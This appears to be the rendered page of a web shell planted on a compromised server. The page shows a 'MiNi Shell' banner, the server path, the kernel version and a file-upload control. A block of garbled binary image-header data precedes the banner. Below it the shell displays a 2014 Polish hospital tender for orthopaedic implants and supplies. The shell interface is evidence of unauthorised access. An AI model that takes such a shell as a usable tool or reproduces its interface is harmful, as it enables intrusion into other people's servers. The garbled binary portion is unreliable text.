JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/7903-N-2014.html

<p class="kh_header"><b>Bochnia: Dostawa materiałów ortopedycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 7903 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów ortopedycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest:
Dostawa materiałów ortopedycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej opisanych w sposób szczegółowy w załączniku nr 3 do SIWZ
2)	Przedmiot zamówienia został podzielony według następujących pakietów
Pakiet nr 1 - Ortopedia
Pakiet nr 2 - Implanty do rekonstrukcji łąkotek  I
Pakiet nr 3 - Płytki blokowane, śruby system 4,0; 5,0; 7,0
Pakiet nr 4 - GWOŹDZIE ŚRÓDSZPIKOWE UDOWE I PISZCZELOWE,  Płytki DSB/DSK
Pakiet nr 5 - Implanty do rekonstrukcji  więzadeł I
Pakiet nr 6 - Kotwice do barku
Pakiet nr 7 - Implanty do rekonstrukcji  więzadeł 
Pakiet nr 8 - Implanty do rekonstrukcji łąkotek.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1).	Dokument dopuszczający oferowany przedmiot zamówienia do obrotu wynikający z ustawy z dnia z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 nr 107 poz. 679), deklaracja zgodności CE i inne wymagane przepisami prawa dokumenty - każdy dokument musi zostać opisany której pozycji i pakietu dotyczy,
2).	Katalogi, materiały informacyjne, które będą potwierdzać spełnianie przez asortyment proponowany przez Wykonawcę parametry wymagane przez Zamawiającego - każda strona materiału informacyjnego musi zostać podpisana którego pakietu i pozycji dotyczy
3).	W ramach pakietu nr 3, 11 próbka  zaopatrzona w oryginalne etykiety producenta lub potwierdzone kopie (1 szt.) - na wniosek Wykonawcy, których oferty nie zostaną wybrane Zamawiający zwróci próbki
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez  Wykonawcę
Ocena spełnienia warunków w zakresie potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom dokonana zostanie wg formuły: spełnia/ nie spełnia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	numeru katalogowego poszczególnych Towarów,
b)	nazwy Towaru przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania,
d)	danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron. 
3.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę cen jednostkowych poszczególnych Towarów objętych umową z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową
4.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatków i opłat granicznych,  
5.	Zamawiający każdorazowo dopuszcza dostawy poszczególnych Towarów objętych umową po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny
6.	Zaistnienie okoliczności wymienionych w ust  5  nie wymaga sporządzenia aneksu.
7.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcie umowy tj.:
a)	zakończenia produkcji Towaru
b)	wygaśnięcia rejestracji Towaru
c)	zmiany ilości poszczególnych pozycji umowy określonych w Załączniku nr 1, pod warunkiem nie przekroczenia ogólnej wartości umowy określonej w § 4 pkt.1.
8.	Na potwierdzenie okoliczności, o których mowa w ust. 6 a), b) Wykonawca przedstawi pisemne zawiadomienie producenta lub stosownego organu.
9.	Wykonawca w sytuacji określonej w ust.6 a), b), w porozumieniu z Zamawiającym zaproponuje produkt równoważny z zachowaniem formy pisemnej pod rygorem nieważności. 
10.	Cena jednostkowa proponowanego produktu nie może być wyższa niż produktu oferowanego w załączniku nr 1 do niniejszej umowy
11.	Zaistnienie okoliczności wymienionych w ust  6 lit. c), nie wymaga sporządzenia aneksu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy, im. bł. Marty Wieckiej.ul.  Krakowska 31, 32-700 Bochnia
Dział Zaopatrzenia i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2014 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Ortopedia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	AO płytka drobna łańcuszkowa           		szt.	4
2.	AO płytka drobna kostna prosta grubość 1mm 		szt.	6
3.	AO płytka kostna drobna kształtna ( L, T, X, H ),		szt.	6
4.	AO  wkręt 2,0 mm do kości drob. 6-kątna samogwintujaca  		szt.	30
5.	Gwóźdź Kirschnera trójgraniec 	szt.	200
6.	Groty Steinmanna 		szt.	6
7.	Podkładka O11/5,0 mm dla wkętów O4,5		szt.	30
8.	Wiertła od O1 - doO3,5		szt.	9
9.	Wkręty do kości gąbczaste z gniazd. sześciokąt. lub krzyżowym 	szt.	30
10.	Wkręty do kości korowej samogwintujące  z gniazd. sześciokąt HA szt.	450
11.	Wkręty do kości korowej samogwintujące z gniazd. sześciokąt HA	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Implanty do rekonstrukcji łąkotek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sterylny zestaw do rekonstrukcji łąkotek - system 4 implantów. Wymagana próbka*		szt.	10
2.	Sterylny zestaw do rekonstrukcji łąkotek - system 3 implantów. Wymagana próbka*		szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Płytki blokowane, śruby system 4,0; 5,0; 7,0.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Płytka do dalszej nasady kości promieniowej blokowana, dłoniowa, wąska i szeroka, tytanowa, prawa i lewa, w części trzonowej 3-5 par otworów - blokowany i kompresyjny. 	szt.	4
2.	Płytka prosta kształtowa blokowana do dalszej nasady kości promieniowej, grzbietowa. 	szt.	1
3.	Płytka L kształtowa, L ukośna blokowana dalszej nasady kości promieniowej, grzbietowa. 	szt.	1
4.	Płytka T kształtowa blokowana dalszej nasady kości promieniowej, grzbietowa. 	szt.	1
5.	Płytka T ukośna 4 otworowa, kształtowa blokowana. 	szt.	1
6.	Płytka prosta rekonstrukcyjna, blokowana. 	szt.	1
7.	Wkręt blokowany, samogwintujący o2,4mm 	szt.	15
8.	Wkręt blokowany, samogwintujący o2,7mm 	szt.	15
9.	Wkręt korowy, samogwintujący o2,7mm 	szt.	5
10.	Płytka prosta rekonstrukcyjna, blokowana. 	szt.	1
11.	Płytka kształtowa blokowana  do obojczyka z hakiem. 	szt.	1
12.	płytka piętowa. 
	szt.	1
13.	Płytka kształtowa wąska L, blokowana, do bliższej nasady kości piszczelowej, zakładana od strony bocznej. 	szt.	3
			
14.	Płytka kształtowa blokowana do bliższej nasady kości ramiennej. 	szt.	1
			
15.	Płytka kształtowa blokowana do dalszej nasady kości piszczelowej, zakładana od strony przyśrodkowej.	szt.	1
			
16.	Płytka kształtowa blokowana do dalszej nasady kości piszczelowej, zakładana od strony przyśrodkowej.	szt.	1
			
17.	Płytka kształtowa blokowana do dalszej nasady kości piszczelowej, zakładana od strony przednio-bocznej.	szt.	1
			
18.	wkręt korowy blokowany, tytanowy, o średnicy O 3,5 mm w rozmiarach 16 - 85 mm, 	szt.	60
19.	wkręt korowy tytanowy, o średnicy O 3,5 mm w rozmiarach 14 - 85 mm,  	szt.	18
20.	Płytka prosta szeroka blokowana kompresyjna z ograniczonym kontaktem. 	szt.	1
21.	płytka ramienna dalsza grzbietowo-boczna
	szt.	3
22.	płytka ramienna dalsza przyśrodkowa	szt.	2
			
23.	Płytka kształtowa blokowana do dalszej nasady kości udowej, zakładana od strony bocznej.	szt.	1
			
24.	Płytka kłykciowa piszczelowa bliższa boczna.	szt.	1
			
25.	płytka wyrostka łokciowego	szt.	1
			
26.	Płytka obojczykowa S.	szt.	1
27.	płytka strzałkowa dalsza boczna	szt.	1
			
28.	Płytka kształtowa szeroka L,  blokowana do bliższej nasady kości piszczelowej, zakładana od strony bocznej. Wersja prawa/lewa. 	szt.	2
29.	Płytka kształtowa blokowana do bliższej nasady kości piszczelowej, zakładana od strony bocznej. 	szt.	1
			
30.	wkręt korowy blokowany, tytanowy, o średnicy O 5,0 mm w rozmiarach 16 - 95mm	szt.	30
31.	wkręt korowy tytanowy, o średnicy O 4,5mm w rozmiarach 20- 95 mm	szt.	4
32.	wkręt blokowany kaniulowany, tytanowy, o średnicy O 7,3mm w rozmiarach 30- 95mm	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.17.70-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 -  GWOŹDZIE ŚRÓDSZPIKOWE UDOWE I PISZCZELOWE,  Płytki DSB/DSK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Gwóźdź piszczelowy (kompresyjno - rekonstrukcyjny). 
	kompl.	12
			
2.	Gwóźdź śródszpikowy ramienny rekonstrukcyjny	kompl.	2
			
3.	Gwóźdź śródszpikowy udowy: (uniwersalny)	kompl.	1
			
4.	Gwóźdź śródszpikowy udowy anatomiczny 	kompl.	8
			
5.	śruby kaniulowane kompresyjne Herberta tytan O3,0/O3,9 dł12-30mm	szt.	30
6.	śruby kompresyjne Herberta tytan O2,5 /O3,2 dł12-30mm                                                                                                                                                                     	szt.	1
7.	śruby kaniulowane kompresyjne Herberta tytan O4,0/O5,0 dł16-60mm	szt.	1
8.	Płytka DSB 4-14 otworowa, 38/135° (kąt trzonowo-szyjkowy) długości części szyjkowej	szt.	30
9.	Płytka DSK 6-14 otworowa 25/95°	szt.	1
10.	Śruba zespalajaca DSB/ DSK 12,5/27, 75 mm-120mm	szt.	30
11.	Uchwyt kompresyjny DSB  (wkręt)	szt.	30
12.	Plytka dystansowa klinowa stalowa do piszczeli, uda do śrub  O4,5	szt.	2
13.	Drut kostny do cerklarzu stalowy O1 mm dł10m 	szt.	1
14.	Płytka prosta szeroka gruba 6-14 otw stalowa L-103-231mm, szer, 16,5mm, gr 4,5mm	szt.	2
15.	Plytka prosta cienka wąska (od 4 otw- 8 otw) stalowa L-71mm-135mm,szer 10,0-10,2 mm, gr max 2,5mm	szt.	2
16.	Wiertła kaniulowalne od O2,5-do O3,5	szt.	7
17.	Wiertła kaniulowalne od O2,5-do O3,5	szt.	2
